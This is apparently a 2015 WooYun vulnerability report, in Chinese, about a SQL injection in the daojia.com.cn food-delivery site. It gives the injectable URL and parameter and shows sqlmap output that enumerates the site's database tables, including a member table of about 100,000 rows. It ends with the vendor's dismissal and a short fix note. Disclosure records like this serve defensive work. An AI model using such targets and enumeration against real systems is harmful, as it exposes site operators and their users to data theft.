漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0161225
漏洞标题:到家美食某处SQL注入漏洞(影响大量注册会员信息)
相关厂商:daojia.com.cn
漏洞作者: 路人甲
提交时间:2015-12-14 15:50
修复时间:2015-12-19 15:52
公开时间:2015-12-19 15:52
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-14: 细节已通知厂商并且等待厂商处理中
2015-12-19: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
到家美食某处SQL注入漏洞(影响大量注册会员信息)
详细说明:
出现sql注入的URL
http://www.daojia.com.cn/review.php?a=83&r=2003
sqlmap跑出来的结果
看看有哪些数据库
大量注册会员信息
Database: daojia
+-----------------------------------------+---------+
| Table | Entries |
+-----------------------------------------+---------+
| Tbl_ActionDetails | 2814984 |
| Tbl_Access | 996189 |
| Tbl_BeiJingAreaRestaurantStat | 735864 |
| Tbl_201312HistoryCartItem | 664350 |
| Tbl_201401HistoryCartItem | 623759 |
| Tbl_BeiJingFood | 619530 |
| Tbl_BeiJingFoodLimit | 619493 |
| Tbl_201311HistoryCartItem | 586665 |
| Tbl_201308HistoryCartItem | 583411 |
| Tbl_201310HistoryCartItem | 527980 |
| Tbl_201307HistoryCartItem | 527561 |
| Tbl_201309HistoryCartItem | 512728 |
| Tbl_Action | 503186 |
| Tbl_201402HistoryCartItem | 478844 |
| Tbl_VisitorStat | 436668 |
| Tbl_201306HistoryCartItem | 409224 |
| Tbl_201305HistoryCartItem | 359163 |
| Tbl_201301HistoryCartItem | 350780 |
| Tbl_201304HistoryCartItem | 333715 |
| Tbl_201303HistoryCartItem | 322358 |
| Tbl_Session | 316389 |
| Tbl_201212HistoryCartItem | 313205 |
| Tbl_Visitor | 298540 |
| Tbl_FoodPhoto | 264860 |
| Tbl_201211HistoryCartItem | 247421 |
| Tbl_201208HistoryCartItem | 237793 |
| Tbl_201207HistoryCartItem | 226471 |
| Tbl_201209HistoryCartItem | 221157 |
| Tbl_201210HistoryCartItem | 216616 |
| Tbl_201403HistoryCartItem | 208613 |
| Tbl_ShangHaiFood | 199828 |
| Tbl_ShangHaiFoodLimit | 199406 |
| Tbl_201302HistoryCartItem | 185388 |
| Tbl_201206HistoryCartItem | 167795 |
| Tbl_ShangHaiAreaRestaurantStat | 157370 |
| Tbl_201312HistoryCart | 151586 |
| Tbl_201205HistoryCartItem | 147893 |
| Tbl_201203HistoryCartItem | 143461 |
| Tbl_201401HistoryCart | 141012 |
| Tbl_201204HistoryCartItem | 138097 |
| Tbl_201311HistoryCart | 138009 |
| Tbl_201308HistoryCart | 133644 |
| Tbl_201112HistoryCartItem | 131951 |
| Tbl_201202HistoryCartItem | 125725 |
| Tbl_201310HistoryCart | 123501 |
| Tbl_201307HistoryCart | 120505 |
| Tbl_201309HistoryCart | 119112 |
| Tbl_BeiJingUsedAddress | 115914 |
| Tbl_201402HistoryCart | 106701 |
| Tbl_Member | 105911 |
| Tbl_SM | 104785 |
| Tbl_201111HistoryCartItem | 100381 |
| Tbl_201201HistoryCartItem | 96176 |
| Tbl_201306HistoryCart | 92479 |
| Tbl_201110HistoryCartItem | 90995 |
| Tbl_201109HistoryCartItem | 88290 |
| Tbl_201108HistoryCartItem | 82310 |
| Tbl_201305HistoryCart | 81121 |
| Tbl_201301HistoryCart | 77091 |
| Tbl_201304HistoryCart | 74801 |
| Tbl_201303HistoryCart | 70882 |
| Tbl_201212HistoryCart | 68421 |
| Tbl_201107HistoryCartItem | 62820 |
| Tbl_ActionStat | 55148 |
| Tbl_201211HistoryCart | 54797 |
| Tbl_201208HistoryCart | 51369 |
| Tbl_201106HistoryCartItem | 50735 |
| Tbl_BeiJingAreaStat | 50112 |
| Tbl_201207HistoryCart | 48427 |
| Tbl_201105HistoryCartItem | 48311 |
| Tbl_201209HistoryCart | 47955 |
| Tbl_201210HistoryCart | 47421 |
| Tbl_201403HistoryCart | 46956 |
| Tbl_AppAdStartRecord | 43792 |
| Tbl_201302HistoryCart | 40439 |
| Tbl_BeiJingFoodCatagory | 38593 |
| Tbl_201104HistoryCartItem | 38133 |
| Tbl_UnknownAddress | 36786 |
| Tbl_201206HistoryCart | 35827 |
| Tbl_201205HistoryCart | 31465 |
| Tbl_201203HistoryCart | 30916 |
| Tbl_201103HistoryCartItem | 30254 |
| Tbl_201204HistoryCart | 29305 |
| Tbl_201112HistoryCart | 28831 |
| Tbl_Topology | 27690 |
| Tbl_201202HistoryCart | 26940 |
| Tbl_BeiJingPresentOrderItem | 26530 |
| Tbl_BeiJingPresentOrder | 26528 |
| Tbl_201101HistoryCartItem | 23501 |
| Tbl_201111HistoryCart | 22396 |
| Tbl_BeiJingRestaurantServiceTime | 21262 |
| Tbl_Pinyin | 20889 |
| Tbl_201201HistoryCart | 20565 |
| Tbl_201110HistoryCart | 20410 |
| Tbl_BeiJingHotFood | 20225 |
| Tbl_201109HistoryCart | 19878 |
| Tbl_201108HistoryCart | 19803 |
| Tbl_KeywordStat | 18153 |
| Tbl_ShangHaiIndexPhrase | 18117 |
| Tbl_201107HistoryCart | 16937 |
| Tbl_ShangHaiUsedAddress | 16339 |
| Tbl_HangZhouFood | 15833 |
| Tbl_HangZhouFoodLimit | 15833 |
| Tbl_ShangHaiFoodCatagory | 15588 |
| Tbl_ShangHaiAreaStat | 15484 |
| Tbl_201102HistoryCartItem | 14968 |
| Tbl_201012HistoryCartItem | 14536 |
| Tbl_BeiJingRestaurantAppraisalHistory | 13046 |
| Tbl_201106HistoryCart | 12632 |
| Tbl_201105HistoryCart | 10789 |
| Tbl_BeiJingIndexPhrase | 10366 |
| Tbl_ShangHaiRestaurantServiceTime | 10038 |
漏洞证明:
如详细说明
修复方案:
对注入参数a 进行过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-12-19 15:52
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无